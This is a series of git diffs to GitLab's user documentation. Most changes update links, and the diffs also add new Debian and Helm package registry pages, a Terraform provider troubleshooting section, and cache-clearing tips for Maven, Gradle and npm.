-89,7 +89,7 @@ tools or rely on 3rd party solutions to streamline their IaC workflows. Read more on setting up and [using the merge request integrations](mr_integration.md). -## The GitLab terraform provider +## The GitLab Terraform provider WARNING: The GitLab Terraform provider is released separately from GitLab. @@ -101,3 +101,39 @@ owned by GitLab, where everyone can contribute. The [documentation of the provider](https://registry.terraform.io/providers/gitlabhq/gitlab/latest/docs) is available as part of the official Terraform provider documentations. + +## Create a new cluster through IaC + +Learn how to [create a new cluster on Google Kubernetes Engine (GKE)](clusters/connect/new_gke_cluster.md). + +## Troubleshooting + +### `gitlab_group_share_group` resources not detected when subgroup state is refreshed + +The GitLab Terraform provider can fail to detect existing `gitlab_group_share_group` resources +due to the issue ["User with permissions cannot retrieve `share_with_groups` from the API"](https://gitlab.com/gitlab-org/gitlab/-/issues/328428). +This results in an error when running `terraform apply` because Terraform attempts to recreate an +existing resource. + +For example, consider the following group/subgroup configuration: + +```plaintext +parent-group +├── subgroup-A +└── subgroup-B +``` + +Where: + +- User `user-1` creates `parent-group`, `subgroup-A`, and `subgroup-B`. +- `subgroup-A` is shared with `subgroup-B`. +- User `terraform-user` is member of `parent-group` with inherited `owner` access to both subgroups. + +When the Terraform state is refreshed, the API query `GET /groups/:subgroup-A_id` issued by the provider does not return the +details of `subgroup-B` in the `shared_with_groups` array. This leads to the error. + +To workaround this issue, make sure to apply one of the following conditions: + +1. The `terraform-user` creates all subgroup resources. +1. Grant Maintainer or Owner role to the `terraform-user` user on `subgroup-B`. +1. The `terraform-user` inherited access to `subgroup-B` and `subgroup-B` contains at least one project. diff --git a/doc/user/infrastructure/mr_integration.md b/doc/user/infrastructure/mr_integration.md index 6f8b1d8d569..66e00bab6ce 100644 --- a/doc/user/infrastructure/mr_integration.md +++ b/doc/user/infrastructure/mr_integration.md @@ -10,7 +10,7 @@ Collaborating around Infrastructure as Code (IaC) changes requires both code cha ## Output Terraform Plan information into a merge request -Using the [GitLab Terraform Report artifact](../../ci/yaml/README.md#artifactsreportsterraform), +Using the [GitLab Terraform Report artifact](../../ci/yaml/index.md#artifactsreportsterraform), you can expose details from `terraform plan` runs directly into a merge request widget, enabling you to see statistics about the resources that Terraform creates, modifies, or destroys. @@ -57,7 +57,7 @@ To manually configure a GitLab Terraform Report artifact requires the following 1. Define a `script` that runs `terraform plan` and `terraform show`. These commands pipe the output and convert the relevant bits into a store variable `PLAN_JSON`. This JSON is used to create a - [GitLab Terraform Report artifact](../../ci/yaml/README.md#artifactsreportsterraform). + [GitLab Terraform Report artifact](../../ci/yaml/index.md#artifactsreportsterraform). The Terraform report obtains a Terraform `tfplan.json` file. The collected Terraform plan report is uploaded to GitLab as an artifact, and is shown in merge requests. diff --git a/doc/user/infrastructure/terraform_state.md b/doc/user/infrastructure/terraform_state.md index 0b92ea46338..57db2b47de4 100644 --- a/doc/user/infrastructure/terraform_state.md +++ b/doc/user/infrastructure/terraform_state.md @@ -242,7 +242,7 @@ An example setup is shown below: Outputs from the data source can now be referenced in your Terraform resources using `data.terraform_remote_state.example.outputs.<OUTPUT-NAME>`. -You need at least [developer access](../permissions.md) to the target project +You need at least the [Developer role](../permissions.md) in the target project to read the Terraform state. ## Migrating to GitLab Managed Terraform state diff --git a/doc/user/markdown.md b/doc/user/markdown.md index fdfd953e52a..fc278007463 100644 --- a/doc/user/markdown.md +++ b/doc/user/markdown.md @@ -31,7 +31,7 @@ and the [main GitLab website](https://about.gitlab.com) use [Kramdown](https://k You should not view this page in the documentation, but instead [view these styles as they appear on GitLab](https://gitlab.com/gitlab-org/gitlab/-/blob/master/doc/user/markdown.md). GitLab Flavored Markdown extends the [CommonMark specification](https://spec.commonmark.org/current/). -It was inspired by [GitHub Flavored Markdown](https://docs.github.com/en/github/writing-on-github/basic-writing-and-formatting-syntax). +It was inspired by [GitHub Flavored Markdown](https://docs.github.com/en/github/writing-on-github/getting-started-with-writing-and-formatting-on-github/basic-writing-and-formatting-syntax). ## Where you can use GitLab Flavored Markdown @@ -412,6 +412,10 @@ A table of contents is an unordered list that links to subheadings in the docume To add a table of contents to a Markdown file, wiki page, issue request, or merge request description, add the `[[_TOC_]]` tag on its own line. +NOTE: +You can add a table of contents to issues and merge requests, but you can't add one +to notes or comments. + ```markdown This is an intro sentence to my Wiki page. @@ -507,7 +511,8 @@ This example links to `<wiki_root>/miscellaneous.md`: GitLab Flavored Markdown renders GitLab-specific references. For example, you can reference an issue, a commit, a team member, or even an entire project team. GitLab Flavored Markdown turns -that reference into a link so you can navigate between them. +that reference into a link so you can navigate between them. All references to projects should use the +**project slug** rather than the project name. Additionally, GitLab Flavored Markdown recognizes certain cross-project references and also has a shorthand version to reference other projects from the same namespace. @@ -519,7 +524,7 @@ GitLab Flavored Markdown recognizes the following: | specific user | `@user_name` | | | | specific group | `@group_name` | | | | entire team | `@all` | | | -| project | `namespace/project>` | | | +| project | `namespace/project` | | | | issue | ``#123`` | `namespace/project#123` | `project#123` | | merge request | `!123` | `namespace/project!123` | `project!123` | | snippet | `$123` | `namespace/project$123` | `project$123` | @@ -1181,7 +1186,7 @@ Do not edit the following codeblock. It uses HTML to skip the Vale ReferenceLink <pre class="highlight"><code>- This is an [inline-style link](https://www.google.com) - This is a [link to a repository file in the same directory](index.md) -- This is a [relative link to a readme one directory higher](../README.md) +- This is a [relative link to a readme one directory higher](../index.md) - This is a [link that also has title text](https://www.google.com "This link takes you to Google!") Using header ID anchors: @@ -1204,7 +1209,7 @@ Some text to show that the reference links can follow later. - This is an [inline-style link](https://www.google.com) - This is a [link to a repository file in the same directory](index.md) -- This is a [relative link to a README one directory higher](../README.md) +- This is a [relative link to a README one directory higher](../index.md) - This is a [link that also has title text](https://www.google.com "This link takes you to Google!") Using header ID anchors: diff --git a/doc/user/packages/composer_repository/index.md b/doc/user/packages/composer_repository/index.md index b5170dfa55b..b6eb2975374 100644 --- a/doc/user/packages/composer_repository/index.md +++ b/doc/user/packages/composer_repository/index.md @@ -293,7 +293,7 @@ To install a package: WARNING: Never commit the `auth.json` file to your repository. To install packages from a CI/CD job, consider using the [`composer config`](https://getcomposer.org/doc/articles/handling-private-packages.md#satis) tool with your personal access token -stored in a [GitLab CI/CD variable](../../../ci/variables/README.md) or in +stored in a [GitLab CI/CD variable](../../../ci/variables/index.md) or in [HashiCorp Vault](../../../ci/secrets/index.md). ## Supported CLI commands diff --git a/doc/user/packages/conan_repository/index.md b/doc/user/packages/conan_repository/index.md index a429e746cf2..c6cc7e7905a 100644 --- a/doc/user/packages/conan_repository/index.md +++ b/doc/user/packages/conan_repository/index.md @@ -269,7 +269,7 @@ conan upload Hello/0.1@mycompany/beta --all > [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/11678) in [GitLab Premium](https://about.gitlab.com/pricing/) 12.7. -To work with Conan commands in [GitLab CI/CD](../../../ci/README.md), you can +To work with Conan commands in [GitLab CI/CD](../../../ci/index.md), you can use `CI_JOB_TOKEN` in place of the personal access token in your commands. You can provide the `CONAN_LOGIN_USERNAME` and `CONAN_PASSWORD` with each Conan diff --git a/doc/user/packages/container_registry/index.md b/doc/user/packages/container_registry/index.md index d6e86e64e78..eecc17fd60d 100644 --- a/doc/user/packages/container_registry/index.md +++ b/doc/user/packages/container_registry/index.md @@ -135,7 +135,7 @@ To view these commands, go to your project's **Packages & Registries > Container ## Build and push by using GitLab CI/CD -Use [GitLab CI/CD](../../../ci/yaml/README.md) to build and push images to the +Use [GitLab CI/CD](../../../ci/yaml/index.md) to build and push images to the Container Registry. Use it to test, build, and deploy your project from the Docker image you created. @@ -154,7 +154,7 @@ To use CI/CD to authenticate, you can use: docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY ``` -- A [CI job token](../../../ci/triggers/README.md#ci-job-token). +- A [CI job token](../../../ci/triggers/index.md#ci-job-token). ```shell docker login -u $CI_JOB_USER -p $CI_JOB_TOKEN $CI_REGISTRY @@ -210,7 +210,7 @@ build: - docker push $CI_REGISTRY/group/project/image:latest ``` -You can also make use of [other CI/CD variables](../../../ci/variables/README.md) to avoid hard-coding: +You can also make use of [other CI/CD variables](../../../ci/variables/index.md) to avoid hard-coding: ```yaml build: @@ -309,7 +309,7 @@ in addition to the steps in the [Docker-in-Docker](../../../ci/docker/using_docker_build.md#use-the-docker-executor-with-the-docker-image-docker-in-docker) section: 1. Update the `image` and `service` to point to your registry. -1. Add a service [alias](../../../ci/yaml/README.md#servicesalias). +1. Add a service [alias](../../../ci/yaml/index.md#servicesalias). Below is an example of what your `.gitlab-ci.yml` should look like: @@ -332,6 +332,36 @@ If you forget to set the service alias, the `docker:19.03.12` image is unable to error during connect: Get http://docker:2376/v1.39/info: dial tcp: lookup docker on 192.168.0.1:53: no such host ``` +### Using a Docker-in-Docker image with Dependency Proxy + +To use your own Docker images with Dependency Proxy, follow these steps +in addition to the steps in the +[Docker-in-Docker](../../../ci/docker/using_docker_build.md#use-the-docker-executor-with-the-docker-image-docker-in-docker) section: + +1. Update the `image` and `service` to point to your registry. +1. Add a service [alias](../../../ci/yaml/index.md#servicesalias). + +Below is an example of what your `.gitlab-ci.yml` should look like: + +```yaml +build: + image: ${CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX}/docker:19.03.12 + services: + - name: ${CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX}/docker:18.09.7-dind + alias: docker + stage: build + script: + - docker build -t my-docker-image . + - docker run my-docker-image /script/to/run/tests +``` + +If you forget to set the service alias, the `docker:19.03.12` image is unable to find the +`dind` service, and an error like the following is thrown: + +```plaintext +error during connect: Get http://docker:2376/v1.39/info: dial tcp: lookup docker on 192.168.0.1:53: no such host +``` + ## Delete images You can delete images from your Container Registry in multiple ways. @@ -533,7 +563,7 @@ You can create a cleanup policy in [the API](#use-the-cleanup-policy-api) or the To create a cleanup policy in the UI: -1. For your project, go to **Settings > CI/CD**. +1. For your project, go to **Settings > Packages & Registries**. 1. Expand the **Clean up image tags** section. 1. Complete the fields. @@ -788,7 +818,7 @@ these steps: the tags' names will be in the `list_o_tags.out` file: ```shell - # Get a list of all tags in a certain container repository while considering [pagination](../../../api/README.md#pagination) + # Get a list of all tags in a certain container repository while considering [pagination](../../../api/index.md#pagination) echo -n "" > list_o_tags.out; for i in {1..N}; do curl --header 'PRIVATE-TOKEN: <PAT>' "https://gitlab.example.com/api/v4/projects/<Project_id>/registry/repositories/<container_repo_id>/tags?per_page=100&page=${i}" | jq '.[].name' | sed 's:^.\(.*\).$:\1:' >> list_o_tags.out; done ``` diff --git a/doc/user/packages/debian_repository/index.md b/doc/user/packages/debian_repository/index.md new file mode 100644 index 00000000000..59213ccb1a0 --- /dev/null +++ b/doc/user/packages/debian_repository/index.md @@ -0,0 +1,111 @@ +--- +stage: Package +group: Package +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Debian packages in the Package Registry **(FREE)** + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/5835) in GitLab 14.1. + +WARNING: +The Debian package registry for GitLab is under development and isn't ready for production use due to +limited functionality. + +Publish Debian packages in your project's Package Registry. Then install the +packages whenever you need to use them as a dependency. + +Project and Group packages are supported. + +For documentation of the specific API endpoints that Debian package manager +clients use, see the [Debian API documentation](../../../api/packages/debian.md). + +## Enable Debian repository feature + +Debian repository support is still a work in progress. It's gated behind a feature flag that's +**disabled by default**. +[GitLab administrators with access to the GitLab Rails console](../../../administration/feature_flags.md) +can opt to enable it. + +To enable it: + +```ruby +Feature.enable(:debian_packages) +``` + +To disable it: + +```ruby +Feature.disable(:debian_packages) +``` + +## Build a Debian package + +Creating a Debian package is documented [on the Debian Wiki](https://wiki.debian.org/Packaging). + +## Create a Distribution + +On the project-level, Debian packages are published using *Debian Distributions*. To publish +packages on the group level, create a distribution with the same `codename`. + +To create a project-level distribution: + +```shell +curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/projects/<project_id>/debian_distributions?codename=unstable +``` + +Example response: + +```json +{ + "id": 1, + "codename": "unstable", + "suite": null, + "origin": null, + "label": null, + "version": null, + "description": null, + "valid_time_duration_seconds": null, + "components": [ + "main" + ], + "architectures": [ + "all", + "amd64" + ] +} +``` + +More information on Debian distribution APIs: + +- [Debian project distributions API](../../../api/packages/debian_project_distributions.md) +- [Debian group distributions API](../../../api/packages/debian_group_distributions.md) + +## Publish a package + +Once built, several files are created: + +- `.deb` files: the binary packages +- `.udeb` files: lightened .deb files, used for Debian-Installer (if needed) +- `.tar.{gz,bz2,xz,...}` files: Source files +- `.dsc` file: Source metadata, and list of source files (with hashes) +- `.buildinfo` file: Used for Reproducible builds (optional) +- `.changes` file: Upload metadata, and list of uploaded files (all the above) + +To upload these files, you can use `dput-ng >= 1.32` (Debian bullseye): + +```shell +cat <<EOF > dput.cf +[gitlab] +method = https +fqdn = <login>:<your_access_token>@gitlab.example.com +incoming = /api/v4/projects/<project_id>/packages/debian +EOF + +dput --config=dput.cf --unchecked --no-upload-log gitlab <your_package>.changes +``` + +## Install a package + +The Debian package registry for GitLab is under development, and isn't ready for production use. You +cannot install packages from the registry. However, you can download files directly from the UI. diff --git a/doc/user/packages/dependency_proxy/index.md b/doc/user/packages/dependency_proxy/index.md index 3dd900d2cbe..e2957aff756 100644 --- a/doc/user/packages/dependency_proxy/index.md +++ b/doc/user/packages/dependency_proxy/index.md @@ -123,7 +123,7 @@ Proxy manually without including the port: docker pull gitlab.example.com:443/my-group/dependency_proxy/containers/alpine:latest ``` -You can also use [custom CI/CD variables](../../../ci/variables/README.md#custom-cicd-variables) to store and access your personal access token or other valid credentials. +You can also use [custom CI/CD variables](../../../ci/variables/index.md#custom-cicd-variables) to store and access your personal access token or other valid credentials. ### Store a Docker image in Dependency Proxy cache @@ -134,13 +134,13 @@ To store a Docker image in Dependency Proxy storage: 1. Use one of these commands. In these examples, the image is `alpine:latest`. 1. You can also pull images by digest to specify exactly which version of an image to pull. - - Pull an image by tag by adding the image to your [`.gitlab-ci.yml`](../../../ci/yaml/README.md#image) file: + - Pull an image by tag by adding the image to your [`.gitlab-ci.yml`](../../../ci/yaml/index.md#image) file: ```shell image: gitlab.example.com/groupname/dependency_proxy/containers/alpine:latest ``` - - Pull an image by digest by adding the image to your [`.gitlab-ci.yml`](../../../ci/yaml/README.md#image) file: + - Pull an image by digest by adding the image to your [`.gitlab-ci.yml`](../../../ci/yaml/index.md#image) file: ```shell image: ${CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX}/alpine@sha256:c9375e662992791e3f39e919b26f510e5254b42792519c180aad254e6b38f4dc @@ -180,7 +180,7 @@ Watch how to [use the Dependency Proxy to help avoid Docker Hub rate limits](htt In November 2020, Docker introduced [rate limits on pull requests from Docker Hub](https://docs.docker.com/docker-hub/download-rate-limit/). -If your GitLab [CI/CD configuration](../../../ci/README.md) uses +If your GitLab [CI/CD configuration](../../../ci/index.md) uses an image from Docker Hub, each time a job runs, it may count as a pull request. To help get around this limit, you can pull your image from the Dependency Proxy cache instead. @@ -252,3 +252,22 @@ hub_docker_quota_check: - | TOKEN=$(curl "https://auth.docker.io/token?service=registry.docker.io&scope=repository:ratelimitpreview/test:pull" | jq --raw-output .token) && curl --head --header "Authorization: Bearer $TOKEN" "https://registry-1.docker.io/v2/ratelimitpreview/test/manifests/latest" 2>&1 ``` + +## Troubleshooting + +### Dependency Proxy Connection Failure + +If a service alias is not set the `docker:19.03.12` image is unable to find the +`dind` service, and an error like the following is thrown: + +```plaintext +error during connect: Get http://docker:2376/v1.39/info: dial tcp: lookup docker on 192.168.0.1:53: no such host +``` + +This can be resolved by setting a service alias for the Docker service: + +```yaml +services: + - name: ${CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX}/docker:18.09.7-dind + alias: docker +``` diff --git a/doc/user/packages/generic_packages/index.md b/doc/user/packages/generic_packages/index.md index e20ac57e64f..cb5258981be 100644 --- a/doc/user/packages/generic_packages/index.md +++ b/doc/user/packages/generic_packages/index.md @@ -20,14 +20,14 @@ Publish generic files, like release binaries, in your project's Package Registry ## Authenticate to the Package Registry -To authenticate to the Package Registry, you need either a [personal access token](../../../api/README.md#personalproject-access-tokens), -[CI/CD job token](../../../api/README.md#gitlab-cicd-job-token), or [deploy token](../../project/deploy_tokens/index.md). +To authenticate to the Package Registry, you need either a [personal access token](../../../api/index.md#personalproject-access-tokens), +[CI/CD job token](../../../api/index.md#gitlab-cicd-job-token), or [deploy token](../../project/deploy_tokens/index.md). In addition to the standard API authentication mechanisms, the generic package API allows authentication with HTTP Basic authentication for use with tools that do not support the other available mechanisms. The `user-id` is not checked and -may be any value, and the `password` must be either a [personal access token](../../../api/README.md#personalproject-access-tokens), -a [CI/CD job token](../../../api/README.md#gitlab-cicd-job-token), or a [deploy token](../../project/deploy_tokens/index.md). +may be any value, and the `password` must be either a [personal access token](../../../api/index.md#personalproject-access-tokens), +a [CI/CD job token](../../../api/index.md#gitlab-cicd-job-token), or a [deploy token](../../project/deploy_tokens/index.md). ## Publish a package file @@ -37,7 +37,7 @@ If a package with the same name, version, and filename already exists, it is als Prerequisites: -- You need to [authenticate with the API](../../../api/README.md#authentication). If authenticating with a deploy token, it must be configured with the `write_package_registry` scope. +- You need to [authenticate with the API](../../../api/index.md#authentication). If authenticating with a deploy token, it must be configured with the `write_package_registry` scope. ```plaintext PUT /projects/:id/packages/generic/:package_name/:package_version/:file_name?status=:status @@ -45,7 +45,7 @@ PUT /projects/:id/packages/generic/:package_name/:package_version/:file_name?sta | Attribute | Type | Required | Description | | -------------------| --------------- | ---------| -------------------------------------------------------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../../../api/README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../../../api/index.md#namespaced-path-encoding). | | `package_name` | string | yes | The package name. It can contain only lowercase letters (`a-z`), uppercase letter (`A-Z`), numbers (`0-9`), dots (`.`), hyphens (`-`), or underscores (`_`). | `package_version` | string | yes | The package version. The following regex validates this: `\A(\.?[\w\+-]+\.?)+\z`. You can test your version strings on [Rubular](https://rubular.com/r/aNCV0wG5K14uq8). | `file_name` | string | yes | The filename. It can contain only lowercase letters (`a-z`), uppercase letter (`A-Z`), numbers (`0-9`), dots (`.`), hyphens (`-`), or underscores (`_`). @@ -77,7 +77,7 @@ If multiple packages have the same name, version, and filename, then the most re Prerequisites: -- You need to [authenticate with the API](../../../api/README.md#authentication). If authenticating with a deploy token, it must be configured with the `read_package_registry` and/or `write_package_registry` scope. +- You need to [authenticate with the API](../../../api/index.md#authentication). If authenticating with a deploy token, it must be configured with the `read_package_registry` and/or `write_package_registry` scope. ```plaintext GET /projects/:id/packages/generic/:package_name/:package_version/:file_name @@ -85,7 +85,7 @@ GET /projects/:id/packages/generic/:package_name/:package_version/:file_name | Attribute | Type | Required | Description | | -------------------| --------------- | ---------| ------------------------------------------------------------------------------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../../../api/README.md#namespaced-path-encoding). | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../../../api/index.md#namespaced-path-encoding). | | `package_name` | string | yes | The package name. | | `package_version` | string | yes | The package version. | | `file_name` | string | yes | The filename. | @@ -108,7 +108,7 @@ curl --user "user:<your_access_token>" \ ## Publish a generic package by using CI/CD -To work with generic packages in [GitLab CI/CD](../../../ci/README.md), you can use +To work with generic packages in [GitLab CI/CD](../../../ci/index.md), you can use `CI_JOB_TOKEN` in place of the personal access token in your commands. For example: diff --git a/doc/user/packages/go_proxy/index.md b/doc/user/packages/go_proxy/index.md index 36348fcde18..0c04c4a23d0 100644 --- a/doc/user/packages/go_proxy/index.md +++ b/doc/user/packages/go_proxy/index.md @@ -142,7 +142,7 @@ the following documentation: - [Dependency Management in Go](../../../development/go_guide/dependencies.md) - [Go Modules Reference](https://golang.org/ref/mod) - [Documentation (`golang.org`)](https://golang.org/doc/) -- [Learn (`learn.go.dev`)](https://learn.go.dev/) +- [Learn (`go.dev/learn`)](https://go.dev/learn/) ### Set environment variables diff --git a/doc/user/packages/helm_repository/index.md b/doc/user/packages/helm_repository/index.md new file mode 100644 index 00000000000..26d8bf76cd6 --- /dev/null +++ b/doc/user/packages/helm_repository/index.md @@ -0,0 +1,89 @@ +--- +stage: Package +group: Package +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Helm charts in the Package Registry **(FREE)** + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/18997) in GitLab 14.1. + +WARNING: +The Helm package registry for GitLab is under development and isn't ready for production use due to +limited functionality. + +Publish Helm packages in your project's Package Registry. Then install the +packages whenever you need to use them as a dependency. + +For documentation of the specific API endpoints that Helm package manager +clients use, see the [Helm API documentation](../../../api/packages/helm.md). + +## Build a Helm package + +Creating a Helm package is documented [in the Helm documentation](https://helm.sh/docs/intro/using_helm/#creating-your-own-charts). + +## Authenticate to the Helm repository + +To authenticate to the Helm repository, you need either: + +- A [personal access token](../../../api/index.md#personalproject-access-tokens). +- A [deploy token](../../project/deploy_tokens/index.md). +- A [CI/CD job token](../../../api/index.md#gitlab-cicd-job-token). + +## Publish a package + +Once built, a chart can be uploaded to the `stable` channel with `curl` or `helm-push`: + +- With `curl`: + + ```shell + curl --request POST \ + --form 'chart=@mychart-0.1.0.tgz' \ + --user <username>:<personal_access_token> \ + https://gitlab.example.com/api/v4/projects/1/packages/helm/api/stable/charts + ``` + +- With the [`helm-push`](https://github.com/chartmuseum/helm-push/#readme) plugin: + + ```shell + helm repo add --username <username> --password <personal_access_token> project-1 https://gitlab.example.com/api/v4/projects/1/packages/helm/stable + helm push mychart-0.1.0.tgz project-1 + ``` + +## Use CI/CD to publish a Helm package + +To publish a Helm package automated through [GitLab CI/CD](../../../ci/index.md), you can use +`CI_JOB_TOKEN` in place of the personal access token in your commands. + +For example: + +```yaml +image: curlimages/curl:latest + +stages: + - upload + +upload: + stage: upload + script: + - 'curl --request POST --user gitlab-ci-token:$CI_JOB_TOKEN --form "chart=@mychart-0.1.0.tgz" "${CI_API_V4_URL}/projects/${CI_PROJECT_ID}/packages/helm/api/stable/charts"' +``` + +## Install a package + +To install the latest version of a chart, use the following command: + +```shell +helm repo add --username <username> --password <personal_access_token> project-1 https://gitlab.example.com/api/v4/projects/1/packages/helm/stable +helm install my-release project-1/mychart +``` + +If the repo has previously been added, you may need to run: + +```shell +helm repo update +``` + +To update the Helm client with the most currently available charts. + +See [Using Helm](https://helm.sh/docs/intro/using_helm/) for more information. diff --git a/doc/user/packages/index.md b/doc/user/packages/index.md index f0bf2fc3363..9158b5cc674 100644 --- a/doc/user/packages/index.md +++ b/doc/user/packages/index.md @@ -17,6 +17,7 @@ The Package Registry supports the following formats: | [Composer](composer_repository/index.md) | 13.2+ | | [Conan](conan_repository/index.md) | 12.6+ | | [Go](go_proxy/index.md) | 13.1+ | +| [Helm](helm_repository/index.md) | 14.1+ | | [Maven](maven_repository/index.md) | 11.3+ | | [npm](npm_registry/index.md) | 11.7+ | | [NuGet](nuget_repository/index.md) | 12.8+ | @@ -40,7 +41,6 @@ guides you through the process. | Conda | [#36891](https://gitlab.com/gitlab-org/gitlab/-/issues/36891) | | CRAN | [#36892](https://gitlab.com/gitlab-org/gitlab/-/issues/36892) | | Debian | [Draft: Merge Request](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/50438) | -| Helm | [#18997](https://gitlab.com/gitlab-org/gitlab/-/issues/18997) | | Opkg | [#36894](https://gitlab.com/gitlab-org/gitlab/-/issues/36894) | | P2 | [#36895](https://gitlab.com/gitlab-org/gitlab/-/issues/36895) | | Puppet | [#36897](https://gitlab.com/gitlab-org/gitlab/-/issues/36897) | diff --git a/doc/user/packages/infrastructure_registry/index.md b/doc/user/packages/infrastructure_registry/index.md index 00370bd2f48..86b85d0c9f5 100644 --- a/doc/user/packages/infrastructure_registry/index.md +++ b/doc/user/packages/infrastructure_registry/index.md @@ -35,7 +35,7 @@ documentation for your package type: ## Use GitLab CI/CD to build packages -To use [GitLab CI/CD](../../../ci/README.md) to build packages, you can +To use [GitLab CI/CD](../../../ci/index.md) to build packages, you can authenticate with the [`CI_JOB_TOKEN` predefined variable](../../../ci/variables/predefined_variables.md). CI/CD templates, which you can use to get started, are in [this repository](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/ci/templates). diff --git a/doc/user/packages/maven_repository/index.md b/doc/user/packages/maven_repository/index.md index 2567cc3b828..70b9c28da76 100644 --- a/doc/user/packages/maven_repository/index.md +++ b/doc/user/packages/maven_repository/index.md @@ -412,7 +412,7 @@ repositories { - The `PROJECT_ID` is your project ID, which you can view on your project's home page. - Replace `gitlab.example.com` with your domain name. - For retrieving artifacts, use either the - [URL-encoded](../../../api/README.md#namespaced-path-encoding) path of the project + [URL-encoded](../../../api/index.md#namespaced-path-encoding) path of the project (like `group%2Fproject`) or the project's ID (like `42`). However, only the project's ID can be used for publishing. @@ -471,7 +471,7 @@ repositories { - For `PROJECT_ID`, use your project ID, which you can view on your project's home page. - Replace `gitlab.example.com` with your domain name. - For retrieving artifacts, use either the - [URL-encoded](../../../api/README.md#namespaced-path-encoding) path of the group + [URL-encoded](../../../api/index.md#namespaced-path-encoding) path of the group (like `group%2Fsubgroup`) or the group's ID (like `12`). ### Instance-level Maven endpoint @@ -530,7 +530,7 @@ repositories { - The `PROJECT_ID` is your project ID, which you can view on your project's home page. - Replace `gitlab.example.com` with your domain name. - For retrieving artifacts, use either the - [URL-encoded](../../../api/README.md#namespaced-path-encoding) path of the project + [URL-encoded](../../../api/index.md#namespaced-path-encoding) path of the project (like `group%2Fproject`) or the project's ID (like `42`). However, only the project's ID can be used for publishing. @@ -745,7 +745,7 @@ You can create a new package each time the `master` branch is updated. <repositories> <repository> <id>gitlab-maven</id> - <url>$env{CI_API_V4_URL}/projects/${env.CI_PROJECT_ID}/packages/maven</url> + <url>${env.CI_API_V4_URL}/projects/${env.CI_PROJECT_ID}/packages/maven</url> </repository> </repositories> <distributionManagement> @@ -813,6 +813,19 @@ You can play around with the regex and try your version strings on [this regular ## Troubleshooting +To improve performance, Maven caches files related to a package. If you encounter issues, clear +the cache with these commands: + +```shell +rm -rf ~/.m2/repository +``` + +If you're using Gradle, run this command to clear the cache: + +```shell +rm -rf ~/.gradle/caches +``` + ### Review network trace logs If you are having issues with the Maven Repository, you may want to review network trace logs. diff --git a/doc/user/packages/npm_registry/index.md b/doc/user/packages/npm_registry/index.md index 735873be237..1e5c294689b 100644 --- a/doc/user/packages/npm_registry/index.md +++ b/doc/user/packages/npm_registry/index.md @@ -90,7 +90,7 @@ To use the GitLab endpoint for npm packages, choose an option: - **Project-level**: Use when you have few npm packages and they are not in the same GitLab group. The [package naming convention](#package-naming-convention) is not enforced at this level. - Instead, you should use a [scope](https://docs.npmjs.com/cli/v6/using-npm/scope) for your package. + Instead, you should use a [scope](https://docs.npmjs.com/cli/v6/using-npm/scope/) for your package. When you use a scope, the registry URL is [updated](#authenticate-to-the-package-registry) only for that scope. - **Instance-level**: Use when you have many npm packages in different GitLab groups or in their own namespace. Be sure to comply with the [package naming convention](#package-naming-convention). @@ -205,7 +205,7 @@ Then, you can run `npm publish` either locally or by using GitLab CI/CD. NPM_TOKEN=<your_token> npm publish ``` -- **GitLab CI/CD:** Set an `NPM_TOKEN` [CI/CD variable](../../../ci/variables/README.md) +- **GitLab CI/CD:** Set an `NPM_TOKEN` [CI/CD variable](../../../ci/variables/index.md) under your project's **Settings > CI/CD > Variables**. ## Package naming convention @@ -287,7 +287,7 @@ Prerequisites: It must match exactly, including the case. This is different than the npm naming convention, but it is required to work with the GitLab Package Registry. -To work with npm commands within [GitLab CI/CD](../../../ci/README.md), you can use +To work with npm commands within [GitLab CI/CD](../../../ci/index.md), you can use `CI_JOB_TOKEN` in place of the personal access token or deploy token in your commands. An example `.gitlab-ci.yml` file for publishing npm packages: @@ -311,8 +311,7 @@ step-by-step guide and demo project for a complete example. ## Configure the GitLab npm registry with Yarn 2 -You can get started with Yarn 2 by following the documentation at -[https://yarnpkg.com/getting-started/install](https://yarnpkg.com/getting-started/install). +You can get started with Yarn 2 by following the [Yarn documentation](https://yarnpkg.com/getting-started/install/). To publish and install with the project-level npm endpoint, set the following configuration in `.yarnrc.yml`: @@ -456,6 +455,14 @@ Due to a bug in npm 6.9.0, deleting distribution tags fails. Make sure your npm When troubleshooting npm issues, first run the same command with the `--verbose` flag to confirm what registry you are hitting. +To improve performance, npm caches files related to a package. Note that npm doesn't remove data by +itself. The cache grows as new packages are installed. If you encounter issues, clear the cache with +this command: + +```shell +npm cache clean --force +``` + ### Error running Yarn with the Package Registry for npm registry If you are using [Yarn](https://classic.yarnpkg.com/en/) with the npm registry, you may get @@ -512,7 +519,7 @@ And the `.npmrc` file should look like: ### `npm install` returns `Error: Failed to replace env in config: ${npm_TOKEN}` -You do not need a token to run `npm install` unless your project is private. The token is only required to publish. If the `.npmrc` file was checked in with a reference to `$npm_TOKEN`, you can remove it. If you prefer to leave the reference in, you must set a value prior to running `npm install` or set the value by using [GitLab CI/CD variables](../../../ci/variables/README.md): +You do not need a token to run `npm install` unless your project is private. The token is only required to publish. If the `.npmrc` file was checked in with a reference to `$npm_TOKEN`, you can remove it. If you prefer to leave the reference in, you must set a value prior to running `npm install` or set the value by using [GitLab CI/CD variables](../../../ci/variables/index.md): ```shell NPM_TOKEN=<your_token> npm install @@ -532,12 +539,24 @@ If you get this error, ensure that: ### `npm publish` returns `npm ERR! 400 Bad Request` -If you get this error, your package name may not meet the +If you get this error, one of the following problems could be causing it. + +#### Package name does not 